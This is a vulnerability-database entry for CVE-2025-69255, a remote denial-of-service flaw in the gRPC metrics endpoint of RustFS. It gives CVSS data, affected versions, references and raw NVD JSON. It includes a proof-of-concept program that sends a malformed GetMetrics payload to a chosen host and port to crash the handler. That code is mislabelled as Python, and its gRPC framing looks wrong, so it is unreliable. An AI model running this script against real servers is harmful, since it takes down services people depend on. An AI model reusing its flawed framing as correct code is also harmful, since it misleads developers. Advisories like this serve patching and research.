CVE-2025-69255

Description

RustFS is a distributed object storage system built in Rust. In versions 1.0.0-alpha.13 to 1.0.0-alpha.77, a malformed gRPC GetMetrics request causes get_metrics to unwrap() failed deserialization of metric_type/opts, panicking the handler thread and enabling remote denial of service of the metrics endpoint. This issue has been patched in version 1.0.0-alpha.78.

CVSS Details

CVSS Score

4.0

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:rustfs:rustfs:1.0.0:alpha13:*:*:*:rust:*:* - VULNERABLE

cpe:2.3:a:rustfs:rustfs:1.0.0:alpha14:*:*:*:rust:*:* - VULNERABLE

cpe:2.3:a:rustfs:rustfs:1.0.0:alpha15:*:*:*:rust:*:* - VULNERABLE

cpe:2.3:a:rustfs:rustfs:1.0.0:alpha16:*:*:*:rust:*:* - VULNERABLE

cpe:2.3:a:rustfs:rustfs:1.0.0:alpha17:*:*:*:rust:*:* - VULNERABLE

RustFS 1.0.0-alpha.13

RustFS 1.0.0-alpha.14

RustFS 1.0.0-alpha.15

RustFS 1.0.0-alpha.16

RustFS 1.0.0-alpha.17

RustFS 1.0.0-alpha.18

RustFS 1.0.0-alpha.19

RustFS 1.0.0-alpha.20

RustFS 1.0.0-alpha.21

RustFS 1.0.0-alpha.22

RustFS 1.0.0-alpha.23

RustFS 1.0.0-alpha.24

RustFS 1.0.0-alpha.25

RustFS 1.0.0-alpha.26

RustFS 1.0.0-alpha.27

RustFS 1.0.0-alpha.28

RustFS 1.0.0-alpha.29

RustFS 1.0.0-alpha.30

RustFS 1.0.0-alpha.31

RustFS 1.0.0-alpha.32

RustFS 1.0.0-alpha.33

RustFS 1.0.0-alpha.34

RustFS 1.0.0-alpha.35

RustFS 1.0.0-alpha.36

RustFS 1.0.0-alpha.37

RustFS 1.0.0-alpha.38

RustFS 1.0.0-alpha.39

RustFS 1.0.0-alpha.40

RustFS 1.0.0-alpha.41

RustFS 1.0.0-alpha.42

RustFS 1.0.0-alpha.43

RustFS 1.0.0-alpha.44

RustFS 1.0.0-alpha.45

RustFS 1.0.0-alpha.46

RustFS 1.0.0-alpha.47

RustFS 1.0.0-alpha.48

RustFS 1.0.0-alpha.49

RustFS 1.0.0-alpha.50

RustFS 1.0.0-alpha.51

RustFS 1.0.0-alpha.52

RustFS 1.0.0-alpha.53

RustFS 1.0.0-alpha.54

RustFS 1.0.0-alpha.55

RustFS 1.0.0-alpha.56

RustFS 1.0.0-alpha.57

RustFS 1.0.0-alpha.58

RustFS 1.0.0-alpha.59

RustFS 1.0.0-alpha.60

RustFS 1.0.0-alpha.61

RustFS 1.0.0-alpha.62

RustFS 1.0.0-alpha.63

RustFS 1.0.0-alpha.64

RustFS 1.0.0-alpha.65

RustFS 1.0.0-alpha.66

RustFS 1.0.0-alpha.67

RustFS 1.0.0-alpha.68

RustFS 1.0.0-alpha.69

RustFS 1.0.0-alpha.70

RustFS 1.0.0-alpha.71

RustFS 1.0.0-alpha.72

RustFS 1.0.0-alpha.73

RustFS 1.0.0-alpha.74

RustFS 1.0.0-alpha.75

RustFS 1.0.0-alpha.76

RustFS 1.0.0-alpha.77

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-69255 PoC - Malformed gRPC GetMetrics Request
// Target: RustFS gRPC metrics endpoint
// Effect: Denial of Service via unwrap() panic

use tonic::Request;
use prost::Message;

// Malformed GetMetrics request that triggers panic
fn create_malformed_request() -> Vec<u8> {
    // Craft a protobuf message with invalid metric_type/opts
    // This will cause unwrap() to fail during deserialization
    let malformed_data = vec![0x08, 0xFF, 0x12, 0x00]; // Invalid encoding
    malformed_data
}

// Alternative: Send partial/corrupted protobuf
fn send_malformed_grpc_request(target: &str, port: u16) {
    use std::net::TcpStream;
    use std::io::{Write, Read};
    
    // gRPC request framing for GetMetrics
    let mut request = Vec::new();
    
    // gRPC headers
    request.extend_from_slice(&[0x00, 0x00, 0x00]); // Compression flag + message length placeholder
    request.push(0x0A); // Field 1: metric_type (varint, malformed)
    request.push(0xFF); // Invalid varint
    request.extend_from_slice(&[0x12, 0x00]); // Empty opts field
    
    // Update length
    let len = request.len() - 3;
    request[0] = (len >> 16) as u8;
    request[1] = (len >> 8) as u8;
    request[2] = len as u8;
    
    // Connect and send
    if let Ok(mut stream) = TcpStream::connect(format!("{}:{}", target, port)) {
        let _ = stream.write_all(&request);
    }
}

fn main() {
    let target = std::env::args().nth(1).unwrap_or("127.0.0.1".to_string());
    let port: u16 = std::env::args().nth(2).and_then(|p| p.parse().ok()).unwrap_or(50051);
    
    println!("Sending malformed GetMetrics request to {}:{}", target, port);
    send_malformed_grpc_request(&target, port);
    println!("Request sent. Target should panic if vulnerable.");
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-69255
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-69255
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-69255/
[4] VulDB https://vuldb.com/cve/CVE-2025-69255
[5] https://github.com/rustfs/rustfs/commit/eb33e82b56ed11fd12bb39416359d8d60737dc7a
[6] https://github.com/rustfs/rustfs/security/advisories/GHSA-gw2x-q739-qhcr

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-69255", "sourceIdentifier": "[email protected]", "published": "2026-01-07T21:16:00.510", "lastModified": "2026-01-16T19:28:22.447", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "RustFS is a distributed object storage system built in Rust. In versions 1.0.0-alpha.13 to 1.0.0-alpha.77, a malformed gRPC GetMetrics request causes get_metrics to unwrap() failed deserialization of metric_type/opts, panicking the handler thread and enabling remote denial of service of the metrics endpoint. This issue has been patched in version 1.0.0-alpha.78."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.5, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-755"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha13:*:*:*:rust:*:*", "matchCriteriaId": "BD2476D6-257C-4A96-BED4-D8B002402242"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha14:*:*:*:rust:*:*", "matchCriteriaId": "774EC64C-73ED-4D6B-893B-30A066DA934C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha15:*:*:*:rust:*:*", "matchCriteriaId": "4B567F4F-131F-4D4B-8C0C-9212F22F2BB3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha16:*:*:*:rust:*:*", "matchCriteriaId": "711F7641-A2B2-410B-B05D-6656F9A1798F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha17:*:*:*:rust:*:*", "matchCriteriaId": "EB79AC62-2B79-441C-BC09-4C834C32EADA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha18:*:*:*:rust:*:*", "matchCriteriaId": "62DE84EE-9F3B-460A-AC13-D2B8CCBC5B4E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha19:*:*:*:rust:*:*", "matchCriteriaId": "DEF70599-6550-49D2-9800-FE3249A66568"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha20:*:*:*:rust:*:*", "matchCriteriaId": "FDFE93A5-B6D7-482A-A891-4D8844604C07"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha21:*:*:*:rust:*:*", "matchCriteriaId": "79AC4F00-B006-46C2-863F-2946BB02B58E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha22:*:*:*:rust:*:*", "matchCriteriaId": "E313A243-ED56-498D-988F-E088693EBB61"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha23:*:*:*:rust:*:*", "matchCriteriaId": "D3A60CB7-1F01-4A60-8555-C225AC89B959"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha24:*:*:*:rust:*:*", "matchCriteriaId": "1C98618D-CF5D-406B-8AA5-34B412F3D43D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha25:*:*:*:rust:*:*", "matchCriteriaId": "98373960-FEDB-4933-92D5-2A597045DD23"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha26:*:*:*:rust:*:*", "matchCriteriaId": "83E0E1A5-3C07-45FF-80FD-0DB375E1575E"}, {"vulnerable": true, "criteria": ... (truncated)